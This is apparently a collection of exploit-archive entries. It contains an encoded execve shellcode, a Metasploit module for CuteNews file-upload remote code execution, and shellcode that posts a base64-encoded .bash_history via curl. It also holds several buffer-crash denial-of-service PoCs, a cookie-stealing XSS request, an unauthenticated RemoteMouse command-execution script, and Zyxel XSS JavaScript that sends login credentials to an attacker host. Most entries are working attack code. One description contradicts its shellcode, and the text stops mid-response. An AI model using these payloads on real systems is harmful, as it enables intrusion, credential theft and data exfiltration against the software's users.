            # Even-index bytes first, then odd-index bytes; the decoder's PUNPCKLBW interleaves them back.
            shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
            shuffled_payload.extend(shuffled_block)

        # Remove trailing NOPS
        # Iterates a reversed copy while deleting from the end of the original list, so the loop is
        # safe. Every trailing 0x90 of the shuffled output is dropped, including a genuine final 0x90
        # of the payload; the decoder still processes the last block as a full 8 bytes regardless.
        for byte in shuffled_payload[::-1]:
            if byte == 0x90:
                del shuffled_payload[-1]
            else:
                break

        # Print shellcode
        # Length printed is count byte + encoded bytes; the two hex forms are for C strings and db lists.
        print('Payload length: {}'.format(len(shuffled_payload)))
        print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
        print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))

        ################################################################################
        DECODER
        ################################################################################

        ; Decoder stub for the MMX-PUNPCKLBW encoding produced by the Python script above.
        ; Shape: jmp/call/pop to obtain EncodedShellcode's address, then one PUNPCKLBW per 8-byte block,
        ; decoding in place, then a jump into the decoded bytes.
        global _start

        section .text
        _start:

        jmp short call_decoder          ; forward jump; `call decoder` below pushes EncodedShellcode's address

        decoder:

        pop edi                         ; edi -> EncodedShellcode (the return address pushed by the call)
        xor ecx, ecx
        mov cl, [edi]                   ; first byte = block count emitted by the encoder
        inc edi                         ; skip the count byte; edi -> first encoded block
        mov esi, edi                    ; start of the (soon decoded) payload, used by the final jmp

        decode:

        movq mm0, qword [edi]           ; low dword: bytes the encoder took from even indices 0,2,4,6
        movq mm1, qword [edi +4]        ; low dword: bytes from odd indices 1,3,5,7
        punpcklbw mm0, mm1              ; interleave the two low dwords byte-wise -> original byte order
        movq qword [edi], mm0           ; write the decoded block back over the encoded one
        add edi, 0x8
        loop decode                     ; ecx = remaining blocks
        jmp esi                         ; execute the decoded payload

        ; Notes: the final block is always processed as 8 bytes even though the encoder trims trailing
        ; 0x90 bytes, so the stub reads and writes up to 7 bytes past the end of EncodedShellcode.
        ; The in-place write also requires the code bytes to be writable as well as executable.
        ; Detection hint: PUNPCKLBW mm, mm/m64 encodes as 0F 60 /r (0F 60 C1 in the C harness below).
        call_decoder:

        call decoder
        EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80

        ################################################################################
        TESTING
        ################################################################################

        #include<stdio.h>
        #include<string.h>

        /* 35-byte decoder stub (the assembly above; it ends with the call's rel32 E8 DF FF FF FF)
         * followed by the 26-byte EncodedShellcode (count byte 0x04 + 25 encoded bytes) = 61 bytes.
         * The buffer contains no 0x00, which is why strlen() in main() reports the full length. */
        unsigned char code[] = \
        "\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";

        /* Test harness: casts the data array to a function pointer and calls it. This only works
         * where `code` is both executable and writable (the decoder writes back into it), i.e. with
         * NX / W^X protection absent for that region - which is exactly what those mitigations
         * prevent. `main()` without a return type is pre-C99 implicit int. */
        main()
        {
        printf("Shellcode Length: %d\n", strlen(code));  /* %d for a size_t; formally %zu, fine for 61 */
        int (*CodeFun)() = (int(*)())code;
        CodeFun();
        }

        ################################################################################


        Kind Regards
        ------------------------------

        Bc. Petr Javorik
        www.mmquant.net
        <http://www.mmquant.net/>maple@mmquant.net


        CuteNews 2.1.2 Remote Code Execution


        This Metasploit module exploits a command execution vulnerability in CuteNews prior to version 2.1.2. The attacker can infiltrate the server through the avatar upload process in the profile area. There is no realistic control of the $imgsize function in "/core/modules/dashboard.php" Header content of the file can be changed and the control can be bypassed. We can use the "GIF" header for this process. An ordinary user is enough to exploit the vulnerability. No need for admin user. The module creates a file for you and allows RCE.


        MD5 | 950718cb4e553313f12dbd3582be8ac7

        ##
        # This module requires Metasploit: https://metasploit.com/download
        # Current source: https://github.com/rapid7/metasploit-framework
        ##

        class MetasploitModule < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient

        # Module metadata and options. From this view: TARGETURI defaults to '/CuteNews';
        # USERNAME is required and PASSWORD optional, both defaulting to 'admin';
        # 'Privileged' => false matches the description's note that an ordinary account suffices.
        def initialize(info = {})
        super(update_info(info,
        'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
        'Description' => %q(
        This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
        The attacker can infiltrate the server through the avatar upload process in the profile area.
        There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
        Header content of the file can be changed and the control can be bypassed.
        We can use the "GIF" header for this process.
        An ordinary user is enough to exploit the vulnerability. No need for admin user.
        The module creates a file for you and allows RCE.
        ),
        'License' => MSF_LICENSE,
        'Author' =>
        [
        'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
        'References' =>
        [
        # NOTE(review): no comma separates the two URL entries below as shown here; as written this
        # does not parse as a two-element array - compare with the upstream module source.
        ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
        ['URL', 'http://cutephp.com'] # Official Website
        ],
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => "Apr 14 2019",
        'DefaultTarget' => 0))

        register_options(
        [
        OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
        ]
        )
        end

        def exec
        res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
        })
        end
        ##
        # Login and cookie information gathering
        ##

        def login(uname, pass, check)
        # 1st request to get cookie
        res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'vars_post' => {
        'action' => 'dologin',
        'username' => uname,
        'password' => pass
        }
        )

        cookie = res.get_cookies
        # 2nd request to cookie validation
        res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "index.php"),
        'cookie' => cookie
        })

        if res.code = 200 && (res.body =~ /dashboard/)
        return cookie
        end

        fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
        return nil
        end

        def peer
        "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
        end
        ##
        # Upload malicious file // payload integration
        ##
        def upload_shell(cookie, check)

        res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
        'cookie' => cookie
        })

        signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
        signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
        # data preparation
        fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
        @shell = "#{fname}"
        pdata = Rex::MIME::Message.new
        pdata.add_part('main', nil, nil, 'form-data; name="mod"')
        pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
        pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
        pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
        pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
        pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
        pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
        pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
        pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
        pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
        data = pdata.to_s

        res = send_request_cgi({
        'method' => 'POST',
        'data' => data,
        'agent' => 'Mozilla',
        'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
        'cookie' => cookie,
        'uri' => normalize_uri(target_uri.path, "index.php")
        })

        if res && res.code == 200 && res.body =~ /User info updated!/
        print_status("Trying to upload #{fname}")
        return true
        else
        fail_with(Failure::NoAccess, 'Error occurred during uploading!')
        return false
        end

        end
        ##
        # Exploit controls and information
        ##
        def exploit
        unless Exploit::CheckCode::Vulnerable == check
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
        end

        cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
        print_good("Authentication was successful with user: #{datastore['USERNAME']}")

        if upload_shell(cookie, true)
        print_good("Upload successfully.")
        exec
        end
        end
        ##
        # Version and Vulnerability Check
        ##
        def check

        res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "index.php")
        })

        unless res
        vprint_error 'Connection failed'
        return CheckCode::Unknown
        end

        if res.code == 200
        version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
        if version < '2.1.3'
        print_status("#{peer} - CuteNews is #{version}")
        return Exploit::CheckCode::Vulnerable
        end
        end

        return Exploit::CheckCode::Safe
        end
        end
        ##
        # The end of the adventure (o_O) // AkkuS
        ##

        Linux/x86 Cat / Encode / POST Shellcode


        125 bytes small Linux/x86 cat file encode to base64 and post via curl to webserver shellcode.


        MD5 | ed92784a59a54c59d40b0ae78ae822ac

         Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
        # Google Dork: None
        # Date: 11.04.2019
        # Exploit Author: strider
        # Vendor Homepage: None
        # Software Link: None
        # Tested on: Debian 9 Stretch i386/ Kali Linux i386
        # CVE : None
        # Shellcode Length: 125
        ------------------------------[Description]---------------------------------

        This shellcode writes a new user to the given passwd file

        Username = sshd
        password = root
        Shell = sh

        -----------------------------[Shellcode Dump]---------------------------------
        ; Linux/x86 execve("//bin/sh", ["//bin/sh", "-c", msg], envp) where msg is the
        ; curl command stored after the call below; its address is recovered with the
        ; jmp / call / pop pattern. edx (envp) is never set. msg ends in 0x0a rather
        ; than NUL; when embedded in the C array in the section below, the string
        ; literal's implicit trailing NUL terminates it.
        ;
        ; Host-level indicator: a /bin/sh -c child that runs curl with -d 'data='
        ; and a base64-encoded file, posting to the configured URL.
        section .text

        global _start

        _start:
        xor eax, eax            ; eax = 0 (NULL / terminator / syscall scratch)
        push eax
        jmp short _cmd          ; forward jump; _cmd calls back so the return address is &msg

        _build:
        pop ecx                 ; ecx = address of msg (pushed by call _build)
        mov edi, ecx            ; keep it in edi for argv[2]
        xor ecx, ecx
        push eax                ; NUL terminator for the path string
        push 0x68732f6e         ; "n/sh"
        push 0x69622f2f         ; "//bi"  -> esp now points at "//bin/sh\0"

        _param:
        mov ebx, esp            ; ebx = pathname "//bin/sh"
        push eax                ; NUL
        push word 0x632d        ; "-c"
        mov esi, esp            ; esi = "-c"

        _exec:
        push eax                ; argv[3] = NULL
        push edi                ; argv[2] = msg
        push esi                ; argv[1] = "-c"
        push ebx                ; argv[0] = "//bin/sh"

        mov ecx, esp            ; ecx = argv
        mov al, 11              ; __NR_execve
        int 0x80

        _cmd:
        call _build             ; pushes &msg and jumps to _build
        msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
        ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
        ;change url to your server
        ; change file to you target file like /etc/passwd


        -----------------------------[Compile]---------------------------------------------
        gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

        -----------------------------[C-Code]-----------------------------

        #include <stdio.h>
        #include <string.h>

        unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";

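        /* Minimal runner: prints the length of shellcode[] and jumps into it. The
         * compile line above passes -z execstack, which on the tested 32-bit
         * systems is what lets the bytes in the data array be executed. */
        int main(void)
        {
            /* strlen returns size_t, so %zu rather than %d. */
            printf("Shellcode Length: %zu\n", strlen(shellcode));

            int (*ret)(void) = (int (*)(void))shellcode;
            ret();
            return 0;
        }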

        UltraVNC Viewer 1.2.2.4 Denial Of Service


        UltraVNC Viewer version 1.2.2.4 suffers from a denial of service vulnerability.


        MD5 | e23840b06d52e7eb04652daaae67eccc

        #Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
        #Discovery by: Victor Mondragón
        #Discovery Date: 2019-04-14
        #Vendor Homepage: https://www.uvnc.com/
        #Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
        #Tested Version: 1.2.2.4
        #Tested on: Windows 7 x64 Service Pack 1

        #Steps to produce the crash:
        #1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
        #2.- Open UltraViewer.txt and copy content to clipboard
        #3.- Open UltraVNC Viewer
        #4.- In "VNC Server" Paste Clipboard
        #5.- Click on "Connect"
        #6.- Crashed

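        # Writes 256 "A" characters to UltraViewer.txt; the text is then pasted by
        # hand into the "VNC Server" field (steps in the header). A context manager
        # closes the file even if the write raises.
        cod = "\x41" * 256

        with open('UltraViewer.txt', 'w') as f:
            f.write(cod)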

        UltraVNC Launcher 1.2.2.4 Denial Of Service


        UltraVNC Launcher version 1.2.2.4 suffers from a denial of service vulnerability.


        MD5 | d81c272d396097f6acdd3f84f3ff0404

        #Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
        #Discovery by: Victor Mondragón
        #Discovery Date: 2019-04-14
        #Vendor Homepage: https://www.uvnc.com/
        #Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
        #Tested Version: 1.2.2.4
        #Tested on: Windows 7 x64 Service Pack 1

        #Steps to produce the crash:
        #1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
        #2.- Open UltraLauncher.txt and copy content to clipboard
        #3.- Open UltraVNC Launcher
        #4.- Select "Properties"
        #5.- In "Path vncviewer.exe" Paste Clipboard
        #6.- Click on "OK"
        #7.- Crashed

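        # Writes 300 "A" characters to UltraLauncher.txt; the text is then pasted by
        # hand into the "Path vncviewer.exe" field (steps in the header). A context
        # manager closes the file even if the write raises.
        cod = "\x41" * 300

        with open('UltraLauncher.txt', 'w') as f:
            f.write(cod)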

        Seo Panel Newsletter 1.2.0 Cross Site Scripting


        Seo Panel Newsletter plugin version 1.2.0 suffers from a cross site scripting vulnerability.


        MD5 | 5d39d7af66210de8dfcf530bc65fae09

        # Exploit Title: Seo Panel Plugin Newsletter 1.2.0 - 'plugins/newsletter/unsubscribemaillist.php email' Cross-site Scripting
        # Google Dork: N/A
        # Date: 15 April 2019
        # Exploit Author: Deyaa Muhammad
        # Author EMail: contact [at] deyaa.me
        # Author Blog: http://deyaa.me
        # Vendor Homepage: http://sp.seopanel.in/
        # Software Link: https://www.seopanel.in/plugin/d/19/newsletter-plugin/demo/
        # Demo Link: https://www.seopanel.in/plugin/showdemo/19/
        # Version: 1.2.0
        # Tested on: WIN7_x68/Linux
        # CVE : N/A

        # Description:
        ----------------------
        Seo Panel Plugin Newsletter 1.2.0 suffers from a Cross-site Scripting vulnerability.

        # POC:
        ----------------------
        1. Access the following path http://[PATH]/plugins/newsletter/unsubscribemaillist.php
        2. Manipulate the parameter "email" with your own XSS payload.

        # Request:
        ----------------------
        GET /plugins/newsletter/unsubscribemaillist.php?email=<htML/+/ONMOuSeOvEr+=+(confirm)(document.cookie)// HTTP/1.1
        Host: sp.seopanel.in
        Connection: close
        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9



        RemoteMouse 3.008 Arbitrary Remote Command Execution


        RemoteMouse version 3.008 suffers from an arbitrary remote command execution vulnerability.


        MD5 | c1044543a8cdc82ff39180dc019ed499

        """
        # Exploit Title: Remote Mouse 3.008 Failure to Authenticate
        # Date: 4/9/2019
        # Exploit Author: 0rphon
        # Software Link: https://www.remotemouse.net/
        # Version: 3.008
        # Tested on: Windows 10

        Remote Mouse 3.008 fails to check for authentication and will execute any command any machine gives it
        This script pops calc as proof of concept (albeit a bit slowly)
        It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
        """

        #!/usr/bin/python2
        from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
        from time import sleep
        from sys import argv

        def Ping(ip):
            """Return True when *ip* answers on TCP/1978 with the Remote Mouse banner.

            Protocol facts visible in this script, useful for detection: the
            service greets on TCP/1978 with "SIN 15win nop nop 300" before the
            client sends anything, and accepts "mos ..." / "key ..." datagrams on
            UDP/1978 with no authentication step anywhere in the exchange.

            Returns False for any other banner. On a connection error or timeout
            the bare ``except`` prints a message and the function falls off the
            end, so the caller sees None (falsy); the socket is not closed on that
            path. Under Python 3 recv() returns bytes and the str comparison could
            never match -- the shebang pins Python 2.
            """
            try:
                target = socket(AF_INET, SOCK_STREAM)
                target.settimeout(5)
                target.connect((ip, 1978))
                # Nothing is sent first; the banner arrives unsolicited.
                response=target.recv(1048)
                target.close()
                if response=="SIN 15win nop nop 300":
                    return True
                else: return False
            except:
                # Catches everything, including KeyboardInterrupt.
                print("ERROR: Request timed out")



        def MoveMouse(x,y,ip):
            """Move the pointer by (x, y) steps, one UDP datagram per step.

            The sign of each coordinate selects the direction and its magnitude
            is the number of datagrams sent. Every datagram opens a fresh UDP
            socket that is never closed explicitly.
            """
            def SendMouse(command,times,ip):
                # Loop variable is local to this nested function; it does not
                # touch the enclosing x.
                for x in range(times):
                    target = socket(AF_INET, SOCK_DGRAM)
                    target.sendto(command,(ip,1978))
                    sleep(0.001)
            if x>0:
                command="mos 5m 1 0"
                SendMouse(command,x,ip)
            elif x<0:
                x=x*-1
                command="mos 5m -1 0"
                SendMouse(command,x,ip)
            if y>0:
                command="mos 5m 0 1"
                SendMouse(command,y,ip)
            elif y<0:
                y=y*-1
                # NOTE(review): "6m" differs from the "5m" used for the other three
                # directions; not verified against the protocol.
                command="mos 6m 0 -1"
                SendMouse(command,y,ip)



        def MousePress(command,ip,action="click"):
            """Send a button message (see the ``mouse`` class) as down, up, or both.

            ``action`` is "down", "up" or "click" (down followed immediately by
            up); anything else raises Exception. The UDP socket is not closed.
            """
            if action=="down":
                target = socket(AF_INET, SOCK_DGRAM)
                target.sendto((command+" d"),(ip,1978))
            elif action=="up":
                target = socket(AF_INET, SOCK_DGRAM)
                target.sendto((command+" u"),(ip,1978))
            elif action=="click":
                target = socket(AF_INET, SOCK_DGRAM)
                target.sendto((command+" d"),(ip,1978))
                target.sendto((command+" u"),(ip,1978))
            else: raise Exception('MousePress: No action named "'+str(action)+'"')


        def SendString(string,ip):
            """Type *string* on the target, one "key" datagram per character.

            Each character is looked up in the module-level ``characters`` table;
            a character that is not in the table raises KeyError. A new UDP
            socket is opened per character and never closed.
            """
            for char in string:
                target = socket(AF_INET, SOCK_DGRAM)
                target.sendto(characters[char],(ip,1978))



        class mouse:
            """Button messages understood by the Remote Mouse UDP listener.

            Each value is the command prefix; MousePress appends " d" or " u"
            for press and release.
            """
            leftClick, rightClick, middleClick = "mos 5R l", "mos 5R r", "mos 5R m"

        # Key messages for SendString: one "key <n>[ras]<code>" string per character,
        # sent verbatim as the UDP payload. NOTE(review): the empty-string key and the
        # "x0" key look like rendering damage (presumably " " and "0"); confirm
        # against the original script before relying on them.
        characters={
        "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
        "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
        "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
        "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
        "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
        "Z":"key 8[ras]111",

        "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
        "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
        "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
        "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
        "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
        "z":"key 7[ras]79",

        "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
        "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 6[ras]13", "9":"key 6[ras]12", "x0":"key 6[ras]5",

        # Control keys: newline maps to Return, backspace to BAS.
        "\n":"key 3RTN", "\b":"key 3BAS", "":"key 7[ras]21",

        "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
        ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
        "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
        "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
        '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
        "~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
        ",":"key 7[ras]25", ".":"key 7[ras]27"
        }


        def PopCalc(ip):
            """Proof of concept: move the pointer 5000 steps left and 3000 down,
            left-click, type "calc.exe", wait, and send Enter.

            Built entirely from the unauthenticated mouse/key messages above.
            The final print passes two arguments, which under Python 2 prints a
            tuple; nothing verifies that the process actually started.
            """
            MoveMouse(-5000,3000,ip)
            MousePress(mouse.leftClick,ip)
            sleep(1)
            SendString("calc.exe",ip)
            sleep(1)
            SendString("\n",ip)
            print("SUCCESS! Process calc.exe has run on target",ip)


        def main():
            """Read the target IP from argv[1], check the banner, then run the PoC.

            Exits with a usage message when no argument is given and with an
            error when Ping does not return True (including the None it yields
            on connection errors).
            """
            try:
                targetIP=argv[1]
            except:
                # Bare except: also masks SystemExit/KeyboardInterrupt.
                print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
                exit()
            if Ping(targetIP)==True:
                PopCalc(targetIP)
            else:
                print("ERROR: Target machine is not running RemoteMouse")
                exit()

        # Script entry point; usage is described in the module docstring.
        if __name__=="__main__":
            main()

        PCHelpWare 2 1.0.0.5 SC Denial Of Service


        PCHelpWare 2 version 1.0.0.5 SC denial of service exploit.


        MD5 | 44390b4f8b4d7d4076fcb6aab958e245

        # -*- coding: utf-8 -*-
        # Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
        # Date: 15/04/2019
        # Author: Alejandra Sánchez
        # Vendor Homepage: https://www.uvnc.com/home.html
        # Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
        # Version: 1.0.0.5
        # Tested on: Windows 10

        # Proof of Concept:
        # 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
        # 2.- Open PCHelpWareV2 Viewer
        # 3.- Go to Tools -> Create SC
        # 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
        # 5.- Click on button -> Create SC
        # 6.- Crashed

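        # Writes 10000 "A" characters to exploit.bmp; the file is then selected by
        # hand through the Create SC dialog (steps in the header). `buffer` shadows a
        # Python 2 builtin but is kept for compatibility. A context manager closes
        # the file even if the write raises.
        buffer = "\x41" * 10000

        with open ("exploit.bmp", "w") as f:
            f.write(buffer)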


        AdminExpress 1.2.5 Denial Of Service


        AdminExpress version 1.2.5 suffers from a Folder Path denial of service vulnerability.


        MD5 | 61dccebfeb1d59a33ab2d2e064816db4

        # -*- coding: utf-8 -*-
        #!/usr/bin/python

        # Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
        # Date: 2019-04-12
        # Exploit Author: Mücahit İsmail Aktaş
        # Software Link: https://admin-express.en.softonic.com/
        # Version: 1.2.5.485
        # Tested on: Windows XP Professional SP2

        # Description:
        #
        # 1) Click the "System Compare" button
        # 2) Paste the payload in the "Folder Path" (left)
        # 3) Click the scales icon (in the middle, right side of "Folder Path")
        #


        # Builds a 5000-character "A" string and prints it, wrapped in a "Payload:"
        # header and trailing blank line, for pasting into the "Folder Path" field
        # (steps in the header). `buffer` shadows a Python 2 builtin; the name is
        # kept for compatibility.
        buffer = "".join("A" for _ in range(5000))

        print("Payload: \n\n%s\n" % buffer)

        PCHelpWare 2 1.0.0.5 Group Denial Of Service


        PCHelpWare 2 version 1.0.0.5 Group denial of service exploit.


        MD5 | 6505ba9bb5a677f32c8ad98d1bab48d8

        # -*- coding: utf-8 -*-
        # Exploit Title: PCHelpWareV2 1.0.0.5 - 'Group' Denial of Service (PoC)
        # Date: 15/04/2019
        # Author: Alejandra Sánchez
        # Vendor Homepage: https://www.uvnc.com/home.html
        # Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
        # Version: 1.0.0.5
        # Tested on: Windows 10

        # Proof of Concept:
        # 1.- Run the python script "PCHelpWareV2.py", it will create a new file "PCHelpWareV2.txt"
        # 2.- Copy the text from the generated PCHelpWareV2.txt file to clipboard
        # 3.- Open PCHelpWareV2 Viewer
        # 4.- Go to Properties
        # 5.- Paste clipboard in 'Group' field and click on button 'Ok'
        # 6.- Crashed

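        # Writes 100 "A" characters to PCHelpWareV2.txt; the text is then pasted by
        # hand into the 'Group' field (steps in the header). `buffer` shadows a
        # Python 2 builtin but is kept for compatibility. A context manager closes
        # the file even if the write raises.
        buffer = "\x41" * 100
        with open ("PCHelpWareV2.txt", "w") as f:
            f.write(buffer)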

        Zyxel ZyWall Cross Site Scripting


        ZyWall 310, ZyWall 110, USG1900, ATP500, and USG40 devices suffer from a cross site scripting vulnerability.


        MD5 | 6a488936efef77d973078a35e0209519

        # Exploit Title: Reflected XSS on Zyxel login pages
        # Date: 10 Apr 2019
        # Exploit Author: Aaron Bishop
        # Vendor Homepage: https://www.zyxel.com/us/en/
        # Version: V4.31
        # Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
        # CVE : 2019-9955

        1. Description
        ==============

        Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
        mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.

        2. Proof of Concept
        =============

        Host a malicious JavaScript file named 'z', or any other single character,
        locally. The contents of 'z' for the following example are:


        -----
        // Injected handler: on the login button click, sends the typed username,
        // password and the page host to $LHOST with a GET (the two requests shown
        // in the server log at the end of this write-up).
        $("button").click(function() {
        $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
        });
        -----


        Close the mp_idx variable with "; and use the getScript functionality of jQuery
        to include the malicious file:

        Request:

        GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
        Host: $RHOST
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1



        Response:

        HTTP/1.1 200 OK
        Date: Wed, 10 Apr 2019 23:13:39 GMT
        Cache-Control: no-cache, private
        Pragma: no-cache
        Expires: Mon, 16 Apr 1973 13:10:00 GMT
        Connection: close
        Content-Type: text/html
        Content-Length: 7957

        <!DOCTYPE html>
        <html>
        <head>
        <title>Welcome</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta charset="utf-8">
        <meta http-equiv="pragma" content="no-cache">
        <link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
        <link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
        <link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
